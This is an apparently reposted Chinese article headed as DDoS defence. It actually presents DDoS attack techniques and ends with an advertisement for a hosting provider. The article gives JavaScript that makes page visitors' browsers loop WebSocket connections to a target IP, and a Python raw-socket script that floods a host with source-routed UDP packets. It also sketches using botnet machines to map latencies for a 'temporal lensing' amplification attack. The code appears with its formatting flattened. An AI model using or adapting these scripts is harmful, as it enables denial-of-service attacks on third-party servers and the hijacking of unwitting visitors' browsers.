新型DDOS攻击该如何防范
websocket是 是HTML5一种新的协议。它实现了浏览器与服务器全双工通信(full-duple)。目前主流的浏览器都能很好地支持websocket,而且用它实现DOS攻击也并不是很难,只要是在js代码中写入相应的代码,当人们打开这个网页是浏览器会自动执行js代码去请求连接要攻击的IP地址,说的有点绕口不过看看代码就能很清楚明白了
CODE:// 创建一个Socket实例varsocket =newWebSocket('ws://localhost:80');// 打开Socket socket.onopen =function(event){// 发送一个初始化消息socket.send('I am freebuf !');// 监听消息socket.onmessage =function(event){console.log('Client received a message',event); };// 监听Socket的关闭socket.onclose =function(event){console.log('Client notified socket has closed',event); };// 关闭Socket.... //socket.close() };//转载自网络
这个功能确实挺好的(虽然我不知道具体哪好,但是就是觉得好- -!),但是我们用它来早DOS完全用不到它的全部功能,只用一个创建实例就行了,比如下面这段代码
websocket testwhile(2>1){varws =newWebSocket("ws://192.168.1.1:80");}
意思就是让浏览器不停循环请求192.168.1.1:80,浏览器也很听话,一直不停的请求。
这种攻击是一种典型的延时攻击形式,“ 以时间换数量”,如果攻击者可以控制多个时间段的多个数据包,让他们同时到达目标,这样 就能使流量 瞬间到达一个峰值,对目标造成很大危害。
这个攻击方式道理不难理解,但是实现起来可是不容易,要让相同源和目的IP的IP报文走不同的路径到达目的地,这一点就是要实现临时透镜攻击的关键所在,我国的互联网基本上是由四张网(电信、联通、移动、教育网)通过互联互通组成的,任意两点之间的路径都能有千千万万条,但是怎么才能有我们自己控制报文的路线呢?
我想到的第一个办法就是用IP协议的宽松源路由选项,学过或者平时比较了解TCP/IP的童鞋们可能听说过这个宽松源路由,但我估计很少有人用,简单点说这个东西是IP协议的选项部分,平时基本用不到,一般IP数据在传输时,通常由路由器自动为其选择路由,但是网络工程师为了使数据绕开出错网络或者为了测试特定线路的吞吐率,需要在信源出控制IP数据报的传输路径,源路由就是为了满足这个要求设计的,源路由有两种,一种叫严格源路由另一种就是我们要说的宽松源路由。ip选项部分可以最多带上9个IP地址,作为这个数据报要走的路径,严格源路由是每一跳都必须按照指定的路由器去走,但是宽松源路由的不用这个严格(如果我没说清楚请自行去查找源路由的相关知识),这不正好满足了进行临时透镜攻击的要求吗!于是乎我兴奋的都睡不着觉了,赶紧写了个源路由测试的demo,代码如下:
#!/usr/bin/python#-*-coding:utf-8-*-importsocketimportstructimportrandomdefchecksum(data):s =0n = len(data) %2foriinrange(0, len(data)-n,2): s+= ord(data[i]) + (ord(data[i+1]) <<8)ifn: s+= ord(data[i+1])while(s >>16): s = (s &0xFFFF) + (s >>16) s = ~s &0xffffreturnsdefIP(udplen):version =4ihl =8tos =0tl =20+12+udplenip_id = random.randint(1,65530)flags =0offset =0ttl =128protocol =17check =0options_code=131options_len=11options_point=4option_ipaddr1=socket.inet_aton('2.2.2.2')#中途想要经过的IP地址,这里为了简单我只写了两个,最多可以带9个option_ipaddr2=socket.inet_aton('1.1.1.1')#源路由IP,最后一个是目的IPoptions_end=0source = socket.inet_aton('3.3.3.3')#源地址destination = socket.inet_aton('1.1.1.1')#目的地址ver_ihl = (version <<4)+ihlflags_offset = (flags <<13)+offsetip_header = struct.pack("!BBHHHBBH4s4sBBB4s4sB", ver_ihl, tos, tl, ip_id, flags_offset, ttl, protocol, check, source, destination, options_code, options_len, options_point, option_ipaddr1, option_ipaddr2, options_end) check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4sBBB4s4sB", ver_ihl, tos, tl, ip_id, flags_offset, ttl, protocol, socket.htons(check), source, destination, options_code, options_len, options_point, option_ipaddr1, option_ipaddr2, options_end)returnip_headerdefudp(sp,dp,datalen):srcport=spdstport=dpudplen=8+datalenudp_checksum=0udp_header = struct.pack("!HHHH",srcport,dstport,udplen,udp_checksum)returnudp_headerdata=20*'\x00'datalen=len(data)srcport=5678dstport=6789udp_header=udp(srcport,dstport,datalen)ip_header=IP(len(udp_header)+datalen)ip_packet=ip_header+udp_header+datas = socket.socket(socket.AF_INET,socket.SOCK_RAW,17)s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)while1:s.sendto(ip_packet,('1.1.1.1',dstport))#1.1.1.1处填目的IP
写完了这个测试代码我赶紧去测试了一下,,,,,,结果,根本就不行,对端收不到发出去的报文,我经过多次测试依然是如此,后来我通过抓包发现在报文调到第三跳的时候被路由器拦下了,并给我回复了一个源路由失败的ICMP,我后来又在电信网测试了一下,这些可好根本一条都出不去,直接拦截了,,,,后来我网上查了一下才知道原来大部分运营商都禁止了源路由,不过有人说在国外不禁止源路由,国外有服务器的朋友可以去测试一下是不是真的,不过在国内想用这个方法实现临时透镜攻击是泡汤了,白兴奋了好几天,我只能再想想其他方法了……..
就是通过DNS解析目的主机的域名来测算B段的时间,可是方法虽巧妙,但是很有局限性,对那些没有自建DNS域名解析的目标就不好测算了,
但是更好的办法我也没有想到,但是我有个非常笨的方法,那些手中“肉鸡”资源丰富的人们可以试试,就是让肉鸡平时随机的traceroute
一些IP地址,然后把结果都返回给控制主机,控制主机通过合并相同路线粗略的算出全网的拓扑和相邻两台路由器的延迟,这样就能粗略的
知道任意IP到任意IP的大概所需时间,这样我们就就能知道A段+B段的总时间了,虽然不精确,但是可以用多个肉鸡进行冗余攻击来弥补,
这样通过反射放大的倍数×临时透镜放大倍数能获得超大的瞬时流量,攻击效果肯定非常震撼,但以上我说的这些都是我胡思乱想的结果.
#/ps:佛山德胜数据中心,可提供高防DDOS服务器租用等等技术支持。迷路的行业大佬可以直接问问官方客服。(www.deshengidc.cn)官方客服企业企鹅:2880269184
